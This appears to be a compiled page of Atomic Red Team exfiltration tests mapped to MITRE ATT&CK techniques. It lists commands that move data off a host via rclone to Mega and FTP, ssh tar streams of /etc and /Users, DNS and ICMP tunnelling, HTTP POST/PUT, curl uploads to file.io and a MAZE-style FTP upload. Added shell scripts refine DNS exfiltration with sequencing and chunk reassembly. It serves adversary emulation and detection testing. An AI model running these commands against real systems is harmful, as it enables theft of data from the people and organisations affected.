Atomic - Exfiltration
T1567.002
Exfiltration Over Web Service: Exfiltration to Cloud Storage
T1048
Exfiltration Over Alternative Protocol
T1048.003
Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol
T1048.002
Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
T1041
Exfiltration Over C2 Channel
T1030
Data Transfer Size Limits
T1020
Automated Exfiltration
T1567.002
Exfiltrate data with rclone to cloud Storage - Mega (Windows)
# Create the rclone config directory and an empty config file
New-Item #{rclone_config_path}\rclone -ItemType Directory
New-Item #{rclone_config_path}\rclone\rclone.conf
cd #{rclone_path}
# Register a Mega remote, then write the remote definition and credentials into the config file
.\rclone.exe config create #{remote_share} mega
Set-Content #{rclone_config_path}\rclone\rclone.conf "[#{remote_share}] `n type = mega `n user = #{mega_user_account} `n pass = #{mega_user_password}"
# Copy everything under the size limit to the remote; -v logs each transferred file
.\rclone.exe copy --max-size 1700k #{dir_to_copy} #{remote_share}:test -v
Extracted indicator: rclone.exe
T1048
Exfiltration Over Alternative Protocol
- Atomic Test #1 - Exfiltration Over Alternative Protocol - SSH
- Atomic Test #2 - Exfiltration Over Alternative Protocol - SSH
Exfiltration Over Alternative Protocol - SSH
ssh #{domain} "(cd /etc && tar -zcvf - *)" > ./etc.tar.gz
Exfiltration Over Alternative Protocol - SSH
tar czpf - /Users/* | openssl des3 -salt -pass #{password} | ssh #{user_name}@#{domain} 'cat > /Users.tar.gz.enc'
DNSExfiltration (doh)
Import-Module #{ps_module}
# -i is the file to exfiltrate; -d the attacker-controlled zone; -p the password used to encrypt the data; -doh the DNS-over-HTTPS provider
Invoke-DNSExfiltrator -i #{input_file} -d #{domain} -p #{password} -doh #{doh} -t #{time} #{encoding}
Extracted indicator: Invoke-DNSExfiltrator
T1048.003
Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol
- Atomic Test #1 - Exfiltration Over Alternative Protocol - HTTP
- Atomic Test #2 - Exfiltration Over Alternative Protocol - ICMP
- Atomic Test #3 - Exfiltration Over Alternative Protocol - DNS
- Atomic Test #4 - Exfiltration Over Alternative Protocol - HTTP
- Atomic Test #5 - Exfiltration Over Alternative Protocol - SMTP
- Atomic Test #7 - Exfiltration Over Alternative Protocol - FTP - Rclone
Exfiltration Over Alternative Protocol - HTTP
#### Run it with these steps!
1. Victim System Configuration:
mkdir /tmp/victim-staging-area
echo "this file will be exfiltrated" > /tmp/victim-staging-area/victim-file.txt
2. Using Python to establish a one-line HTTP server on the victim system (SimpleHTTPServer is the Python 2 module; on Python 3 the equivalent is python3 -m http.server 1337):
cd /tmp/victim-staging-area
python -m SimpleHTTPServer 1337
3. To retrieve the data from an adversary system:
wget http://VICTIM_IP:1337/victim-file.txt
Exfiltration Over Alternative Protocol - ICMP
# Sends the file 1024 bytes at a time as ICMP echo payloads. -Encoding Byte is Windows PowerShell 5.1 syntax; PowerShell 7 uses -AsByteStream instead.
$ping = New-Object System.Net.NetworkInformation.Ping; foreach($Data in Get-Content -Path #{input_file} -Encoding Byte -ReadCount 1024) { $ping.Send("#{ip_address}", 1500, $Data) }
Exfiltration Over Alternative Protocol - DNS
#### Run it with these steps!
1. On the adversary machine run the below command. The display filter is single-quoted so that the double quotes around ".domain" survive the shell.
tshark -f "udp port 53" -Y 'dns.qry.type == 1 and dns.flags.response == 0 and dns.qry.name matches ".domain"' >> received_data.txt
2. On the victim machine run the below commands. Each line of hex becomes one query name; the two commands run one after the other, not as a pipeline.
xxd -p input_file > encoded_data.hex; for data in $(cat encoded_data.hex); do dig "$data.domain"; done
3. Once the data is received, use the below command to recover the data. xxd -p emits 30 bytes per line, so any file larger than that arrives as several queries that must be reassembled in the order they were sent; awk drops repeated queries (resolver retries) while keeping arrival order, which a sort would destroy.
cat received_data.txt | cut -d "A" -f 2 | cut -d " " -f 2 | cut -d "." -f 1 | awk '!seen[$0]++' | xxd -p -r
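The DNS procedure above relies on the receiver seeing the queries in the order they were sent, and on the data fitting the 63-octet label limit. The following is an added example, not part of Atomic Red Team or of the original page: it prefixes each hex chunk with a sequence number so the receiver can reorder and de-duplicate the queries, and it checks the round trip against a constructed tshark-style capture. The zone exfil.example, the capture lines and the sample file are all constructed for the demo; nothing is sent on the network.

```sh
#!/bin/sh
# Added example (not from Atomic Red Team): sequence-numbered DNS exfiltration
# and a receiver that tolerates out-of-order and duplicated queries.

DOMAIN="exfil.example"   # assumed attacker-controlled zone (placeholder)

# Encode FILE as query names of the form <seq>.<hex>.<zone>. Hex keeps the
# label inside [0-9a-f]; 30 bytes -> 60 hex chars, under the 63-octet label
# limit of RFC 1035. Usage: dns_encode FILE
dns_encode() {
    od -An -v -tx1 "$1" | tr -d ' \n' | fold -w 60 \
        | awk -v zone="$DOMAIN" '{ printf "%d.%s.%s\n", NR, $1, zone }'
}

# Rebuild the file from capture lines (one query per line, tshark style).
# Only names ending in the zone are used; queries are sorted by sequence
# number, duplicates dropped, and the hex turned back into bytes via octal
# escapes so that printf '%b' works in any POSIX shell. Usage: dns_decode CAPTURE
dns_decode() {
    esc=$(awk -v zone="$DOMAIN" '
            { for (i = 1; i <= NF; i++) {
                  p = index($i, "." zone)
                  if (p > 0 && substr($i, p) == "." zone) {
                      n = split($i, part, ".")
                      if (n >= 3) print part[1], part[2]
                  }
              } }' "$1" \
          | sort -n -k1,1 -u \
          | awk 'BEGIN { h = "0123456789abcdef" }
                 { s = $2
                   for (j = 1; j < length(s); j += 2)
                       printf "\\0%03o", (index(h, substr(s, j, 1)) - 1) * 16 + index(h, substr(s, j + 1, 1)) - 1 }')
    printf '%b' "$esc"
}

# Round trip on a constructed sample: the capture shows chunk 2 first, chunk 1
# twice (a resolver retry) and an unrelated lookup. Returns 0 on a byte-exact match.
dns_roundtrip_demo() {
    tmp=$(mktemp -d) || return 1
    printf 'this file will be exfiltrated\nsecond line of the sample\n' > "$tmp/victim-file.txt"
    dns_encode "$tmp/victim-file.txt" > "$tmp/names.txt"
    {
        sed -n '2p' "$tmp/names.txt" | awk '{ print "1 0.000 10.0.0.5 -> 10.0.0.1 DNS 100 Standard query 0x1b2c A " $1 }'
        printf '2 0.010 10.0.0.5 -> 10.0.0.1 DNS 74 Standard query 0x1b2d A www.example.com\n'
        sed -n '1p' "$tmp/names.txt" | awk '{ print "3 0.020 10.0.0.5 -> 10.0.0.1 DNS 100 Standard query 0x1b2e A " $1 }'
        sed -n '1p' "$tmp/names.txt" | awk '{ print "4 1.020 10.0.0.5 -> 10.0.0.1 DNS 100 Standard query 0x1b2e A " $1 }'
    } > "$tmp/capture.txt"
    dns_decode "$tmp/capture.txt" > "$tmp/recovered.txt"
    cmp -s "$tmp/victim-file.txt" "$tmp/recovered.txt"
    rc=$?
    rm -rf "$tmp"
    return $rc
}
```

Run `dns_roundtrip_demo` and check its exit status. Against a real zone the sender would pipe `dns_encode FILE` through `dig` one name per query, as the atomic test does, and the receiver would feed the tshark output to `dns_decode`. Hex doubles the size of the data; base32 would fit more bytes per label but the decoder would need a base32 step in place of the octal-escape awk.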
Exfiltration Over Alternative Protocol - HTTP
$content = Get-Content #{input_file}
Invoke-WebRequest -Uri #{ip_address} -Method POST -Body $content
Exfiltration Over Alternative Protocol - SMTP
Send-MailMessage -From #{sender} -To #{receiver} -Subject "T1048.003 Atomic Test" -Attachments #{input_file} -SmtpServer #{smtp_server}
MAZE FTP Upload
$Dir_to_copy = "$env:windir\temp"
$ftp = "ftp://#{ftp_server}/"
$web_client = New-Object System.Net.WebClient
$web_client.Credentials = New-Object System.Net.NetworkCredential('#{username}', '#{password}')
if (Test-Connection -Count 1 -ComputerName "#{ftp_server}" -Quiet) {
    foreach ($file in (dir $Dir_to_copy "*.7z")) {
        echo "Uploading $file..."
        $uri = New-Object System.Uri($ftp + $file.name)
        $web_client.UploadFile($uri, $file.FullName)
    }
} else {
    echo "FTP Server Unreachable. Please verify the server address in input args and try again."
}
Exfiltration Over Alternative Protocol - FTP - Rclone
$rclone_bin = Get-ChildItem C:\Users\Public\Downloads\ -Recurse -Include "rclone.exe" | Select-Object -ExpandProperty FullName
$exfil_pack = Get-ChildItem C:\Users\Public\Downloads\ -Recurse -Include "exfil.zip" | Select-Object -ExpandProperty FullName
&$rclone_bin config create ftpserver "ftp" "host" #{ftp_server} "port" #{ftp_port} "user" #{ftp_user} "pass" #{ftp_pass}
&$rclone_bin copy --max-age 2y $exfil_pack ftpserver --bwlimit 2M -q --ignore-existing --auto-confirm --multi-thread-streams 12 --transfers 12 -P --ftp-no-check-certificate
Python3 http.server
if [ $(which python3) ]; then cd /tmp; python3 -m http.server 9090 & PID=$!; sleep 10; kill $PID; unset PID; fi
T1048.002
Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Exfiltrate data HTTPS using curl windows
#{curl_path} -F 'file=@#{input_file}' -F 'maxDownloads=1' -F 'autoDelete=true' https://file.io/
Exfiltrate data HTTPS using curl linux
curl -F 'file=@#{input_file}' -F 'maxDownloads=1' -F 'autoDelete=true' https://file.io/
T1041
Exfiltration Over C2 Channel
C2 Data Exfiltration
if(-not (Test-Path #{filepath})){
1..100 | ForEach-Object { Add-Content -Path #{filepath} -Value "This is line $_." }
}
[System.Net.ServicePointManager]::Expect100Continue = $false
$filecontent = Get-Content -Path #{filepath}
Invoke-WebRequest -Uri #{destination_url} -Method POST -Body $filecontent -DisableKeepAlive
T1030
Data Transfer Size Limits
Data Transfer Size Limits
cd #{folder_path}; split -b 5000000 #{file_name}
ls -l #{folder_path}
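The split command above leaves xaa, xab, ... behind and says nothing about how the other end checks and reassembles the pieces. The following is an added example, not from Atomic Red Team or the original page: it chunks a file with split, writes a manifest of per-chunk checksums, verifies every piece before concatenating them in name order, and shows that a tampered chunk is rejected. The 16-byte chunk size, the part_ prefix and the sample file are chosen for the demo; nothing leaves the local temp directory.

```sh
#!/bin/sh
# Added example (not from Atomic Red Team): size-limited chunking with a
# checksum manifest and a verifying reassembler.

CHUNK_BYTES=16   # assumed for the demo; the atomic test uses 5000000

# Split FILE into CHUNK_BYTES pieces named PREFIXaa, PREFIXab, ... and record
# "cksum size name" for each piece in PREFIX.manifest. Usage: make_chunks FILE PREFIX
make_chunks() {
    split -b "$CHUNK_BYTES" "$1" "$2"
    for c in "$2"??; do cksum "$c"; done > "$2.manifest"
}

# Check every chunk listed in the manifest, then concatenate them in name
# order (the split suffixes sort lexically). Non-zero if a chunk is missing
# or its checksum or size differs. Usage: reassemble PREFIX OUTFILE
reassemble() {
    prefix=$1
    out=$2
    while read -r sum size name; do
        [ -f "$name" ] || { echo "missing chunk: $name" >&2; return 1; }
        set -- $(cksum "$name")
        [ "$1" = "$sum" ] && [ "$2" = "$size" ] \
            || { echo "corrupt chunk: $name" >&2; return 1; }
    done < "$prefix.manifest"
    cat "$prefix"?? > "$out"
}

# Demo on a constructed 20-line file: clean reassembly must match the original,
# and reassembly after appending a byte to one chunk must fail. Returns 0 if both hold.
chunk_roundtrip_demo() {
    tmp=$(mktemp -d) || return 1
    awk 'BEGIN { for (i = 1; i <= 20; i++) printf "This is line %d.\n", i }' > "$tmp/big.txt"
    make_chunks "$tmp/big.txt" "$tmp/part_"
    reassemble "$tmp/part_" "$tmp/rebuilt.txt" || { rm -rf "$tmp"; return 1; }
    cmp -s "$tmp/big.txt" "$tmp/rebuilt.txt"
    ok=$?
    printf 'X' >> "$tmp/part_ab"   # tamper with one chunk
    if reassemble "$tmp/part_" "$tmp/rebuilt2.txt" 2>/dev/null; then ok=1; fi
    rm -rf "$tmp"
    return $ok
}
```

The manifest travels with the chunks; on the receiving side `reassemble` refuses to concatenate anything whose checksum or length disagrees with it, which is the check a transfer over a lossy or size-capped channel needs before the pieces are trusted.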
T1020
Automated Exfiltration
IcedID Botnet HTTP PUT
$fileName = "#{file}"
$url = "#{domain}"
$file = New-Item -Force $fileName -Value "This is ART IcedID Botnet Exfil Test"
$contentType = "application/octet-stream"
try {Invoke-WebRequest -Uri $url -Method Put -ContentType $contentType -InFile $fileName} catch{}